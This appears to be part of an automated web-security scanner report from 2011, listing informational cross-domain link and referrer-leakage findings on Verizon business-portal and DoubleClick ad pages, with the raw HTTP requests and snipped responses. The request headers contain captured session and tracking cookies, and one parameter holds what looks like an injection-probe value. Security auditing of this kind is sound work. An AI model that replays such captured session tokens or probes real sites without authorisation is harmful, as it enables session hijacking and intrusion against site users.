15.1. http://ad.doubleclick.net/adi/N2870.vznbiz/B3160296 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2870.vznbiz/B3160296

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N2870.vznbiz/B3160296;sz=300x300;ord=782085613?

The response contains the following links to other domains:

http://s0.2mdn.net/836848/0806_inc_cars_off_red.gif
http://s0.2mdn.net/836848/0806_inc_cars_on_red.gif
http://s0.2mdn.net/836848/0806_inc_flights_off_red.gif
http://s0.2mdn.net/836848/0806_inc_flights_on_red.gif
http://s0.2mdn.net/836848/0806_inc_hotels_off_red.gif
http://s0.2mdn.net/836848/0806_inc_hotels_on_red.gif
http://s0.2mdn.net/836848/0806_inc_logo_red.gif
http://s0.2mdn.net/836848/0806_inc_packages_off_red.gif
http://s0.2mdn.net/836848/0806_inc_packages_on_red.gif
http://s0.2mdn.net/836848/0806_inc_search_red.gif
http://s0.2mdn.net/836848/lilshimmy.gif
http://s0.2mdn.net/836848/lilshimmy_red.gif
http://www.orbitz.com/shared/pagedef/content/air/max_passenger_popup.jsp

Request

GET /adi/N2870.vznbiz/B3160296;sz=300x300;ord=782085613? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/smb_portlets/myapplication_rp/smb_orbitz.jsp
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 40948
Date: Mon, 05 Sep 2011 22:36:03 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><html>
<head>

<style type=text/css>
#orbot { width: 300px; height: 300px; bo
...[SNIP]...
<td>
           <img src=http://s0.2mdn.net/836848/0806_inc_flights_on_red.gif><br>
...[SNIP]...
<a href=javascript:swapto('box2')><img src=http://s0.2mdn.net/836848/0806_inc_hotels_off_red.gif border=0></a>
...[SNIP]...
<a href=javascript:swapto('box3')><img src=http://s0.2mdn.net/836848/0806_inc_cars_off_red.gif border=0></a>
...[SNIP]...
<a href=javascript:swapto('box4')><img src=http://s0.2mdn.net/836848/0806_inc_packages_off_red.gif border=0></a>
...[SNIP]...
<a href=javascript:swapto('box1')><img src=http://s0.2mdn.net/836848/0806_inc_flights_off_red.gif border=0></a><br>
       </td>
       <td>
           <img src=http://s0.2mdn.net/836848/0806_inc_hotels_on_red.gif><br>
...[SNIP]...
<a href=javascript:swapto('box3')><img src=http://s0.2mdn.net/836848/0806_inc_cars_off_red.gif border=0></a>
...[SNIP]...
<a href=javascript:swapto('box4')><img src=http://s0.2mdn.net/836848/0806_inc_packages_off_red.gif border=0></a>
...[SNIP]...
<a href=javascript:swapto('box1')><img src=http://s0.2mdn.net/836848/0806_inc_flights_off_red.gif border=0></a>
...[SNIP]...
<a href=javascript:swapto('box2')><img src=http://s0.2mdn.net/836848/0806_inc_hotels_off_red.gif border=0></a><br>
       </td>
       <td>
           <img src=http://s0.2mdn.net/836848/0806_inc_cars_on_red.gif><br>
...[SNIP]...
<a href=javascript:swapto('box4')><img src=http://s0.2mdn.net/836848/0806_inc_packages_off_red.gif border=0></a>
...[SNIP]...
<a href=javascript:swapto('box1')><img src=http://s0.2mdn.net/836848/0806_inc_flights_off_red.gif border=0></a>
...[SNIP]...
<a href=javascript:swapto('box2')><img src=http://s0.2mdn.net/836848/0806_inc_hotels_off_red.gif border=0></a>
...[SNIP]...
<a href=javascript:swapto('box3')><img src=http://s0.2mdn.net/836848/0806_inc_cars_off_red.gif border=0></a><br>
       </td>
       <td>
           <img src=http://s0.2mdn.net/836848/0806_inc_packages_on_red.gif><br>
...[SNIP]...
<td width=300 bgcolor=#ffffff><img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=5><br>
...[SNIP]...
<td width=300 bgcolor=#aaa07d><img src=http://s0.2mdn.net/836848/lilshimmy_red.gif><br>
...[SNIP]...
<td width=3><img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=22><br>
...[SNIP]...
<td width=300 bgcolor=#aaa07d><img src=http://s0.2mdn.net/836848/lilshimmy_red.gif><br>
...[SNIP]...
<td width=5 bgcolor="#FFFFFF"><img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=10 height=225><br>
...[SNIP]...
<td width=285 valign=top bgcolor="#FFFFFF">
<img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=20>
<table border=0 cellpadding=0 cellspacing=0>
...[SNIP]...
<td colspan=2><img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=10><br>
...[SNIP]...
</table>
           <img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=20><br>
...[SNIP]...
<td colspan=3>
                       <img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=10><br>
...[SNIP]...
</table>
           <img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=20>
           <table border=0 cellpadding=0 cellspacing=0>
...[SNIP]...
<span class=small><a href=http://www.orbitz.com/shared/pagedef/content/air/max_passenger_popup.jsp target=_blank onClick="return maxPopUp()">(up to 9)</a>
...[SNIP]...
<input type=hidden name="WT.mc_ev" value="click" />
           <img src=http://s0.2mdn.net/836848/lilshimmy.gif width=1 height=30>
           <table border=0 cellpadding=0 cellspacing=0>
...[SNIP]...
<td width=219>
                       <img src=http://s0.2mdn.net/836848/0806_inc_logo_red.gif><br>
...[SNIP]...
<a href="javascript:fcheck('orbot', 'slice1:dateTime:date', 'slice2:dateTime:date')"><img src=http://s0.2mdn.net/836848/0806_inc_search_red.gif border=0></a>
...[SNIP]...
<td width=5 bgcolor=#ffffff><img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=225><br>
...[SNIP]...
<td width=285 valign=top bgcolor=#ffffff>
           <img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=20>
           <table border=0 cellpadding=0 cellspacing=0>
...[SNIP]...
<td width=65>
                       <img src=http://s0.2mdn.net/836848/lilshimmy_red.gif><span class=norm>
...[SNIP]...
<td colspan=2><img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=20><br>
...[SNIP]...
<td colspan=2><img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=10><br>
...[SNIP]...
<td colspan=2><img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=20><br>
...[SNIP]...
<td colspan=2><img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=10><br>
...[SNIP]...
<input type=hidden name="WT.mc_ev" value="click" />
           <img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=20><br>
...[SNIP]...
<td width=219>
                       <img src=http://s0.2mdn.net/836848/0806_inc_logo_red.gif><br>
...[SNIP]...
<a href=submit onClick="fcheck('hotelsearchform', 'startDate', 'endDate'); return false;"><img src=http://s0.2mdn.net/836848/0806_inc_search_red.gif border=0></a>
...[SNIP]...
<td width=5 bgcolor=#ffffff><img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=225><br>
...[SNIP]...
<td width=285 valign=top bgcolor=#ffffff>
           <img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=20><br>
...[SNIP]...
</table>
           <img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=10><br>
...[SNIP]...
</table>
           <img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=20><br>
...[SNIP]...
</table>
           <img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=10><br>
...[SNIP]...
<input type=hidden name="WT.mc_ev" value="click" />
           <img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=20><br>
...[SNIP]...
<td width=219>
                       <img src=http://s0.2mdn.net/836848/0806_inc_logo_red.gif><br>
...[SNIP]...
<a href=submit onClick="fcheck('carsearchform', 'startDate:date', 'endDate:date'); return false;"><img src=http://s0.2mdn.net/836848/0806_inc_search_red.gif border=0></a>
...[SNIP]...
<td width=5 bgcolor=#ffffff><img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=196><br>
...[SNIP]...
<td width=285 valign=top bgcolor=#ffffff>
           <img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=20><br>
...[SNIP]...
<td colspan=2><img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=10><br>
...[SNIP]...
</table>
           <img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=20><br>
...[SNIP]...
<td colspan=2><img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=10><br>
...[SNIP]...
<span class=small><a href=http://www.orbitz.com/shared/pagedef/content/air/max_passenger_popup.jsp target=_blank onClick="return maxPopUp()">(up to 4)</a>
...[SNIP]...
<input type=hidden name="WT.mc_ev" value="click" />
           <img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=20>
           <table border=0 cellpadding=0 cellspacing=0>
...[SNIP]...
<td width=219>
                       <img src=http://s0.2mdn.net/836848/0806_inc_logo_red.gif><br>
...[SNIP]...
<a href=submit onClick="fcheck('fhotel', 'slice1:dateTime:date', 'slice2:dateTime:date'); return false;"><img src=http://s0.2mdn.net/836848/0806_inc_search_red.gif border=0></a>
...[SNIP]...
<td width=5 bgcolor=#ffffff><img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=196><br>
...[SNIP]...
<td width=285 valign=top bgcolor=#ffffff>
           <img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=20><br>
...[SNIP]...
<td colspan=2><img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=10><br>
...[SNIP]...
</table>
           <img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=20><br>
...[SNIP]...
<td colspan=2><img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=10><br>
...[SNIP]...
<span class=small><a href=http://www.orbitz.com/shared/pagedef/content/air/max_passenger_popup.jsp target=_blank onClick="return maxPopUp()">(up to 4)</a>
...[SNIP]...
<input type=hidden name="WT.mc_ev" value="click" />
           <img src=http://s0.2mdn.net/836848/lilshimmy_red.gif width=1 height=20>
           <table border=0 cellpadding=0 cellspacing=0>
...[SNIP]...
<td width=219>
                       <img src=http://s0.2mdn.net/836848/0806_inc_logo_red.gif><br>
...[SNIP]...
<a href=submit onClick="fcheck('fhc', 'slice1:dateTime:date', 'slice2:dateTime:date'); return false;"><img src=http://s0.2mdn.net/836848/0806_inc_search_red.gif border=0></a>
...[SNIP]...

15.2. http://ad.doubleclick.net/adj/syn.verizon/news_read_atf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/syn.verizon/news_read_atf

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adj/syn.verizon/news_read_atf;tile=1;sz=300x250;postalcode=%3C[token=

The response contains the following link to another domain:

http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png

Request

GET /adj/syn.verizon/news_read_atf;tile=1;sz=300x250;postalcode=%3C[token= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 5212
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 05 Sep 2011 22:42:46 GMT
Expires: Mon, 05 Sep 2011 22:42:46 GMT

var divid='dclkAdsDivID_7488';
document.write('<div id=' + divid + '></div>');
var adsenseHtml_7488 = "<!doctype html><html><head><style><!--\na:link { color: #000000 }a:visited { color: #000000 }a:ho
...[SNIP]...
zon.com/headlines/portals/headlines.portal%26hl%3Den%26client%3Dca-pub-9242135695870166%26adU%3Dwww.Unitek.com/CCNP%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNE5f8XAlkmkGDEZFWzOlaOweqXNKw\" target=_blank><img alt=\"AdChoices\" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...

15.3. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://business.verizon.net
Path:	/SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The page was loaded from a URL containing a query string:

http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overview

The response contains the following links to other domains:

http://b2b.vzw.com/
http://player.kamera.com/kit-vx-jpg/afp/2414736_Prisonersabused_20110902-120x90.jpg
http://player.kamera.com/kit-vx-jpg/afp/2417122_Cubansslowly_20110902-120x90.jpg
http://publish.vx.roo.com/thumbnails/1223/996064_3.jpg

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overview HTTP/1.1
Host: business.verizon.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: SaasSessionID=6HwvTlTDDDqxbJHQylhDzp1qy40cPyFnn5JkYgDhB2FQrR0Dm7d2!1058537351; AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; AkaSTrackingID=F03373E721508DB1B1034D461D039B58

Response

15.4. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://business.verizon.net
Path:	/SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The page was loaded from a URL containing a query string:

http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_newsandresources_headlinedetail&newsId=48291&portletTitle=Small%20Business%20Expert%20Advice&FromHeroTab=article&Headline=Five%20Powerful%20Lists%20to%20Help%20You%20Take%20Command%20of%20Your%20Work%20Life

The response contains the following links to other domains:

http://b2b.vzw.com/
http://tadalist.com/
http://www.rememberthemilk.com/

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_newsandresources_headlinedetail&newsId=48291&portletTitle=Small%20Business%20Expert%20Advice&FromHeroTab=article&Headline=Five%20Powerful%20Lists%20to%20Help%20You%20Take%20Command%20of%20Your%20Work%20Life HTTP/1.1
Host: business.verizon.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overview
Cookie: SaasSessionID=6HwvTlTDDDqxbJHQylhDzp1qy40cPyFnn5JkYgDhB2FQrR0Dm7d2!1058537351; AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; AkaSTrackingID=F03373E721508DB1B1034D461D039B58; WT_FPC=id=2c3c65f8f20234949171315269354494:lv=1315269354494:ss=1315269354494; CP=null*; tzone=300; POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

15.5. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_news_ins_federatedMediaBlog previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://business.verizon.net
Path:	/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_news_ins_federatedMediaBlog

Issue detail

The page was loaded from a URL containing a query string:

http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_news_ins_federatedMediaBlog?_nfpb=true&_portlet.contentOnly=true&_portlet.instanceLabel=SMBPortal_portlet_news_ins_federatedMediaBlog&_portlet.contentMode=FRAGMENT&_portlet.async=true&_portlet.lafUniqueId=SMB_CustomLaFDefinitionLabel_1&_portlet.themeName=SMB_PortletGray_Border&_portlet.themeAltSkeleton=true&_portlet.themeAltSkin=true&_portlet.portalUrl=%2FSMBPortalWeb%2Fappmanager%2FSMBPortal%2Fsmb&_portlet.portalId=SMBPortal%09smb&_portlet.contentType=text%2Fhtml%3B+charset%3DUTF-8&_portlet.asyncMode=compat_9_2&_portlet.discEnabled=true&_pageLabel=SMBPortal_page_main_overview&_portlet.title=Small+Business+Expert+Advice&_nfsp=true

The response contains the following link to another domain:

http://fls.doubleclick.net/activityi;src=1475931;type=busin689;cat=newsa995;ord=

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_news_ins_federatedMediaBlog?_nfpb=true&_portlet.contentOnly=true&_portlet.instanceLabel=SMBPortal_portlet_news_ins_federatedMediaBlog&_portlet.contentMode=FRAGMENT&_portlet.async=true&_portlet.lafUniqueId=SMB_CustomLaFDefinitionLabel_1&_portlet.themeName=SMB_PortletGray_Border&_portlet.themeAltSkeleton=true&_portlet.themeAltSkin=true&_portlet.portalUrl=%2FSMBPortalWeb%2Fappmanager%2FSMBPortal%2Fsmb&_portlet.portalId=SMBPortal%09smb&_portlet.contentType=text%2Fhtml%3B+charset%3DUTF-8&_portlet.asyncMode=compat_9_2&_portlet.discEnabled=true&_pageLabel=SMBPortal_page_main_overview&_portlet.title=Small+Business+Expert+Advice&_nfsp=true HTTP/1.1
Host: business.verizon.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overview
Cookie: SaasSessionID=6HwvTlTDDDqxbJHQylhDzp1qy40cPyFnn5JkYgDhB2FQrR0Dm7d2!1058537351; AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; AkaSTrackingID=F03373E721508DB1B1034D461D039B58; WT_FPC=id=2c3c65f8f20234949171315269354494:lv=1315269354494:ss=1315269354494; CP=null*; tzone=300

Response

15.6. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_ovrvw_inst_businessNews previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://business.verizon.net
Path:	/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_ovrvw_inst_businessNews

Issue detail

The page was loaded from a URL containing a query string:

http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_ovrvw_inst_businessNews?_nfpb=true&_portlet.contentOnly=true&_portlet.instanceLabel=SMBPortal_portlet_ovrvw_inst_businessNews&_portlet.contentMode=FRAGMENT&_portlet.async=true&_portlet.lafUniqueId=SMB_CustomLaFDefinitionLabel_1&_portlet.themeName=SMB_PortletGray_Border&_portlet.themeAltSkeleton=true&_portlet.themeAltSkin=true&_portlet.portalUrl=%2FSMBPortalWeb%2Fappmanager%2FSMBPortal%2Fsmb&_portlet.portalId=SMBPortal%09smb&_portlet.contentType=text%2Fhtml%3B+charset%3DUTF-8&_portlet.asyncMode=compat_9_2&_portlet.discEnabled=true&_pageLabel=SMBPortal_page_main_overview&_portlet.title=Business+News&_nfsp=true

The response contains the following links to other domains:

http://graphics.nytimes.com/images/2011/09/06/sports/football/06giants-pic/06giants-pic-articleInline.jpg
http://graphics.nytimes.com/images/2011/09/06/sports/tennis/06day-pic-2/06day-pic-2-articleInline.jpg
http://www.nytimes.com/2011/09/06/sports/football/giants-eli-manning-searching-for-comfort-zone-with-new-center.html?partner=VERIZON&ei=5115
http://www.nytimes.com/2011/09/06/sports/tennis/2011-us-open-day-8.html?partner=VERIZON&ei=5115
http://www.nytimes.com/aponline/2011/09/05/business/AP-EU-Netherlands-Hacking-Incident.html?partner=VERIZON&ei=5115

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb/SMBPortal_portlet_ovrvw_inst_businessNews?_nfpb=true&_portlet.contentOnly=true&_portlet.instanceLabel=SMBPortal_portlet_ovrvw_inst_businessNews&_portlet.contentMode=FRAGMENT&_portlet.async=true&_portlet.lafUniqueId=SMB_CustomLaFDefinitionLabel_1&_portlet.themeName=SMB_PortletGray_Border&_portlet.themeAltSkeleton=true&_portlet.themeAltSkin=true&_portlet.portalUrl=%2FSMBPortalWeb%2Fappmanager%2FSMBPortal%2Fsmb&_portlet.portalId=SMBPortal%09smb&_portlet.contentType=text%2Fhtml%3B+charset%3DUTF-8&_portlet.asyncMode=compat_9_2&_portlet.discEnabled=true&_pageLabel=SMBPortal_page_main_overview&_portlet.title=Business+News&_nfsp=true HTTP/1.1
Host: business.verizon.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_overview
Cookie: SaasSessionID=6HwvTlTDDDqxbJHQylhDzp1qy40cPyFnn5JkYgDhB2FQrR0Dm7d2!1058537351; AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; AkaSTrackingID=F03373E721508DB1B1034D461D039B58; WT_FPC=id=2c3c65f8f20234949171315269354494:lv=1315269354494:ss=1315269354494; CP=null*; tzone=300

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Content-Length: 10168
Expires: Mon, 05 Sep 2011 22:35:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 05 Sep 2011 22:35:56 GMT
Connection: close
Vary: Accept-Encoding

<div class="＿bea-wlp-disc-context-hook" id="7468656d655f745f31343334303036"><div class="wlp-bighorn-theme wlp-bighorn-theme-SMB_PortletGray_Border"><div class="＿bea-wlp-disc-context-hook
...[SNIP]...
</span>

                                   <a style="font-size:10pt;" target="_blank" href="http://www.nytimes.com/aponline/2011/09/05/business/AP-EU-Netherlands-Hacking-Incident.html?partner=VERIZON&ei=5115"
                                    onclick="dcsClick('EX_NewsAndResources_Business News OpenThirdPartyURL','Third Party The New York Times Link')"
                                    title="Experts Suspect Iran Involvement in Dutch Hacking">
                                       Experts Suspect Iran Involvement...
                                   </a>
...[SNIP]...
<td valign="top" style="padding-top:5px;padding-bottom:1px;padding-right:5px;padding-left:5px;" >

                   <img src=http://graphics.nytimes.com/images/2011/09/06/sports/football/06giants-pic/06giants-pic-articleInline.jpg title="New York Times" alt="" border="0" height="50" width="50"/>

               </td>
...[SNIP]...
</span>

                                   <a style="font-size:10pt;" target="_blank" href="http://www.nytimes.com/2011/09/06/sports/football/giants-eli-manning-searching-for-comfort-zone-with-new-center.html?partner=VERIZON&ei=5115"
                                    onclick="dcsClick('EX_NewsAndResources_Business News OpenThirdPartyURL','Third Party The New York Times Link')"
                                    title="New Center, and New Relationship, for Manning">
                                       New Center, and New Relationship,...
                                   </a>
...[SNIP]...
<td valign="top" style="padding-top:5px;padding-bottom:1px;padding-right:5px;padding-left:5px;" >

                   <img src=http://graphics.nytimes.com/images/2011/09/06/sports/tennis/06day-pic-2/06day-pic-2-articleInline.jpg title="New York Times" alt="" border="0" height="50" width="50"/>

               </td>
...[SNIP]...
</span>

                                   <a style="font-size:10pt;" target="_blank" href="http://www.nytimes.com/2011/09/06/sports/tennis/2011-us-open-day-8.html?partner=VERIZON&ei=5115"
                                    onclick="dcsClick('EX_NewsAndResources_Business News OpenThirdPartyURL','Third Party The New York Times Link')"
                                    title="Serena Williams Powers Into Quarterfinals">
                                       Serena Williams Powers Into...
                                   </a>
...[SNIP]...

15.7. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBProtal_portlet_hiddenNews_articleDetails_quicklinks previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://business.verizon.net
Path:	/SMBPortalWeb/appmanager/SMBPortal/smb/SMBProtal_portlet_hiddenNews_articleDetails_quicklinks

Issue detail

The page was loaded from a URL containing a query string:

http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb/SMBProtal_portlet_hiddenNews_articleDetails_quicklinks?_nfpb=true&_portlet.contentOnly=true&_portlet.instanceLabel=SMBProtal_portlet_hiddenNews_articleDetails_quicklinks&_portlet.contentMode=FRAGMENT&_portlet.async=true&_portlet.lafUniqueId=SMB_CustomLaFDefinitionLabel_1&_portlet.themeName=SMB_PortletGray_Border&_portlet.themeAltSkeleton=true&_portlet.themeAltSkin=true&_portlet.portalUrl=%2FSMBPortalWeb%2Fappmanager%2FSMBPortal%2Fsmb&_portlet.portalId=SMBPortal%09smb&_portlet.contentType=text%2Fhtml%3B+charset%3DUTF-8&_portlet.asyncMode=compat_9_2&_portlet.discEnabled=true&_pageLabel=SMBPortal_page_newsandresources_headlinedetail&_portlet.title=Quick+Links&_nfsp=true

The response contains the following link to another domain:

https://email.vzwshop.com/servlet/website/ResponseForm?OSPE8b6_vimpg_zf8_9httNgpmR

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb/SMBProtal_portlet_hiddenNews_articleDetails_quicklinks?_nfpb=true&_portlet.contentOnly=true&_portlet.instanceLabel=SMBProtal_portlet_hiddenNews_articleDetails_quicklinks&_portlet.contentMode=FRAGMENT&_portlet.async=true&_portlet.lafUniqueId=SMB_CustomLaFDefinitionLabel_1&_portlet.themeName=SMB_PortletGray_Border&_portlet.themeAltSkeleton=true&_portlet.themeAltSkin=true&_portlet.portalUrl=%2FSMBPortalWeb%2Fappmanager%2FSMBPortal%2Fsmb&_portlet.portalId=SMBPortal%09smb&_portlet.contentType=text%2Fhtml%3B+charset%3DUTF-8&_portlet.asyncMode=compat_9_2&_portlet.discEnabled=true&_pageLabel=SMBPortal_page_newsandresources_headlinedetail&_portlet.title=Quick+Links&_nfsp=true HTTP/1.1
Host: business.verizon.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_newsandresources_headlinedetail&newsId=48291&portletTitle=Small%20Business%20Expert%20Advice&FromHeroTab=article&Headline=Five%20Powerful%20Lists%20to%20Help%20You%20Take%20Command%20of%20Your%20Work%20Life
Cookie: SaasSessionID=6HwvTlTDDDqxbJHQylhDzp1qy40cPyFnn5JkYgDhB2FQrR0Dm7d2!1058537351; AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; AkaSTrackingID=F03373E721508DB1B1034D461D039B58; WT_FPC=id=2c3c65f8f20234949171315269354494:lv=1315269365057:ss=1315269354494; CP=null*; tzone=300; POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

